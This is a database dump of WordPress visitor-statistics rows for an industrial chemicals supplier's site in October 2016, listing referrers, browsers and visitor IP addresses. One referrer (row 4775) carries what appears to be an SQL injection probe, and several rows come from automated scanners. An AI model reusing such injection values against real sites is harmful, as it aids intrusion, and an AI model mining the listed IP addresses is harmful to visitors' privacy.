INSERT INTO `wp_statistics_visitor` VALUES (4712, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '120.76.207.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4713, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4714, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '106.37.236.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4715, '2016-10-16', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'Chrome', 'Windows', '53.0.2785.143', '', '195.81.71.18', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4716, '2016-10-16', 'https://lvov.mistr-x.org/', 'Opera', 'Windows', '8.50', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4717, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4718, '2016-10-16', 'https://www.miller-stephenson.com/krytox-noise-vibration-harshness/', 'MSIE', 'Windows', '9.0', '', '204.79.180.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4719, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.92.107.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4720, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.158.95.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4721, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.147.192.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4722, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4723, '2016-10-16', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjl0Y6B2d_PAhVOJYEKHQS8AdAYABAA&sig=AOD64_12zdGwdPbK30rUk9plVOHCsMfskQ&rct=j&q=&ved=0ahUKEwiF1YuB2d_PAhWD5SYKHdumCL8Q0QwIlQE&adurl=', 'Firefox', 'Windows', '12.0', '', '138.207.176.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4724, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '99.235.116.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4725, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.177.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4726, '2016-10-16', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '27.109.7.83', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4727, '2016-10-16', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=41', 'MSIE', 'Windows', '9.0', '', '182.118.22.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4728, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.147.244.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4729, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.127.223.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4730, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.169.216.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4731, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '119.160.136.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4732, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4733, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4734, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4735, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '71.238.127.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4736, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.75.194.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4737, '2016-10-16', 'https://www.google.fr/', 'Firefox', 'Windows', '49.0', '', '90.42.80.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4738, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '92.61.156.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4739, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.220.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4740, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.6.77.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4741, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.70.11.160', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4742, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.153.134.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4743, '2016-10-16', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '108.170.51.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4744, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.66.156.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4745, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.21.36.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4746, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.192.167.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4747, '2016-10-16', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.25.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4748, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.0.188.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4749, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.248.85.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4750, '2016-10-16', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4751, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4752, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '67.3.234.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4753, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.93.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4754, '2016-10-16', 'https://www.google.fi/', 'Firefox', 'Windows', '49.0', '', '88.85.158.163', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4755, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4756, '2016-10-16', 'https://www.miller-stephenson.com/conformal-coating/', 'MSIE', 'Windows', '9.0', '', '204.79.180.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4757, '2016-10-16', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '5.154.123.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4758, '2016-10-16', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.35.187.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4759, '2016-10-16', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.88.18.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4760, '2016-10-16', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '76.7.184.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4761, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.225.147.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4762, '2016-10-16', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.6', '', '201.90.31.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4763, '2016-10-16', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4764, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.200.9.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4765, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4766, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.18.222.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4767, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '23.242.120.236', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4768, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.59.121.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4769, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '47.152.59.72', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4770, '2016-10-16', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1211.dFAZ1BHX7bX34SQqo2rd-OJhX0cCBFNGHPRG1EXfz7nDkaNteHxvFhxcwq8FxMIQ.6502e499e38020646e8807605487fc1539a6f260&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhZeXhETXl3bnZYeDNkc1hvTVBLam8tY1VSSmJQRlB0cVdDVk4yQVdyejZMbVZDaWFxRDYxR1RidTFMSGdZSFQ4ZGhMQ0NyVkNuUFNJTG5UQWVxejdNZw&b64e=2&sign=9fd8878ff99648bfd8d23286847d6c5e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQl84QxWpOYLJaJW0UV1qlIzqxVPADzbrfzj-miO9IZCJzne2mY5Vau1pQiwM-VTyZA1j9y_jpfUwtKtfxwPbQ8FwwEIdNBsHTwAZGVfAMhlbUpvk2cMMH9fg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4df7WGXYQcOgFha-HxvQ9yZfJQXyxBRkL7rTw7yNkIvZ9kaTBQDPQ62SiG0mp7zlf2oHzGEhs2fVNwizhkrcz0s&l10n=ru&cts=1476643677894&mc=3.48627975278', 'Chrome', 'Windows', '28.0.1500.95', '', '46.188.22.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4771, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '216.176.18.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4772, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.92.84.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4773, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.73.94.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4774, '2016-10-16', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4775, '2016-10-16', 'https://www.miller-stephenson.com/products/?DepartmentId=84\\\\\\\'A=0', 'Firefox', 'Windows', '3.5.2', '', '72.211.205.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4776, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.151.193.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4777, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '208.90.138.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4778, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '198.100.51.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4779, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '24.193.212.151', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4780, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4781, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4782, '2016-10-16', 'https://almata.xkaz.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4783, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.34.93.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4784, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '73.231.124.171', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4785, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.81.174.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4786, '2016-10-16', 'https://www.google.com.au/aclk?sa=L&ai=DChcSEwi_zPzgn-DPAhWFWn4KHQaYCekYABAA&sig=AOD64_25qj_eoexMvlK19DPFmAGAe5AUwg&rct=j&q=&ved=0ahUKEwie4ffgn-DPAhXKzlQKHSNSCIMQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '101.187.51.243', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4787, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.132.179.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4788, '2016-10-16', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjXzo7FoeDPAhWOin4KHfxHB6wYABAA&ei=P_ADWM2MFYeMjwSh-LDIAQ&sig=AOD64_1FZdwYUQgmb3p7NChaalPwFayO-A&rct=j&q=&sqi=2&ved=0ahUKEwiNqIrFoeDPAhUHxoMKHSE8DBkQ0QwIPA&adurl=', 'MSIE', 'Windows', '11.0', '', '75.43.11.159', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4789, '2016-10-16', 'https://nasatech.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=258&rows_per_page=1000&mc=NTB_October2016NTB&email=TM%40thetatek.com&eresponse=1&urlpassthru=&category_id=71589&category_id=42859&category_id=42846&category_id=63069&category_id=42841&category_id=42851', 'Firefox', 'Windows', '49.0', '', '47.217.152.49', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4790, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.89.199.253', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4791, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.1', '', '64.125.188.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4792, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '47.0.2526.111', '', '72.198.88.93', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4793, '2016-10-16', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '107.77.105.32', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4794, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '162.244.80.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4795, '2016-10-16', 'https://www.google.ca/', 'Chrome', 'Windows', '49.0.2623.112', '', '130.113.108.70', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4796, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.220.239.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4797, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.11.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4798, '2016-10-16', 'https://www.bing.com/search?q=krytox+MIL+PRF-27617+&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4799, '2016-10-16', 'https://www.miller-stephenson.com/mil-prf-27617-greases/', 'MSIE', 'Windows', '9.0', '', '204.79.180.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4800, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4801, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.5.6', '', '78.85.234.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4802, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.127.235.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4803, '2016-10-16', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '195.188.234.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4804, '2016-10-16', 'https://forums.iboats.com/forum/engine-repair-and-maintenance/mercruiser-i-o-inboard-engines-outdrives/398994-limits-of-jb-weld-block-repairs', 'Safari', 'iPhone', '10.0', '', '24.12.128.87', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4805, '2016-10-16', 'https://www.miller-stephenson.com/miller/careers.html', 'MSIE', 'Windows', '9.0', '', '182.118.22.226', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4806, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4807, '2016-10-16', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy/unmodified-liquid-epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4808, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Chrome OS', '52.0.2743.75', '', '174.18.34.45', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4809, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.66.180.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4810, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '66.68.116.245', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4811, '2016-10-16', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '110.85.113.18', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4812, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.237.61.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4813, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.74.14.34', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4814, '2016-10-16', 'https://45.79.81.203:65080/t.txt', 'Mechanize', 'Unknown', '2.7.3', '', '173.232.42.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4815, '2016-10-16', 'https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CCAQFjAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=Ew0EWI2TJcLQ9QO3gwE&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'MSIE', 'Windows', '11.0', '', '66.249.88.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4816, '2016-10-16', 'https://kinogonew.ru/', 'Opera', 'Windows', '8.50', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4817, '2016-10-16', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '71.95.44.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4818, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.128.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4819, '2016-10-16', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.143.69.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4820, '2016-10-16', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.4.1', '', '70.186.250.227', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4821, '2016-10-16', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '67.204.237.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4822, '2016-10-16', 'https://forums.iboats.com/forum/engine-repair-and-maintenance/mercruiser-i-o-inboard-engines-outdrives/398994-limits-of-jb-weld-block-repairs', 'Chrome', 'Android', '30.0.0.0', '', '104.33.249.30', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4823, '2016-10-16', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.121.104.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4824, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.22.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4825, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.6.8', '', '107.20.220.83', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4826, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4827, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4828, '2016-10-17', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '73.34.253.132', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4829, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.101.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4830, '2016-10-17', 'https://www.google.com/', 'Safari', 'iPad', '600.1.4', '', '68.52.64.65', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4831, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4832, '2016-10-17', 'https://www.bing.com/search?&q=+57%20%20bus%C4%B1ness%20%20company%20ltd%20contact%20us%20mail&scope=web&setmkt=en-AU&setlang=match&first=261', 'MSIE', 'Windows', '11.0', '', '31.209.110.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4833, '2016-10-17', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjq86SJzeDPAhWRXH4KHdwfDUkYABAI&sig=AOD64_1c6r3sM5LgyQNysFqgzOXtxYsYlg&rct=j&q=&ved=0ahUKEwjE76CJzeDPAhVn9YMKHRJbBOUQ0QwILQ&adurl=', 'MSIE', 'Windows', '11.0', '', '174.2.109.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4834, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4835, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.36.156.26', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4836, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '5.135.144.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4837, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4838, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.199.71.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4839, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '104.235.150.125', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4840, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Chrome OS', '53.0.2785.154', '', '75.106.22.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4841, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.59.208.69', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4842, '2016-10-17', 'https://www.google.co.kr/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.253.144.72', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4843, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.26.21.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4844, '2016-10-17', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '183.60.202.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4845, '2016-10-17', 'https://r.search.yahoo.com/_ylt=AwrSbgVwJgRYwJ4ALGVXNyoA;_ylu=X3oDMTEycHFxaGUwBGNvbG8DZ3ExBHBvcwM2BHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1476695792/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=bCCCgJTh8hMrgnyZ80xTPqAQG5s-', 'MSIE', 'Windows', '11.0', '', '211.41.27.105', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4846, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4847, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4848, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.189.105.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4849, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '114.216.126.201', '000', 1, 0); 
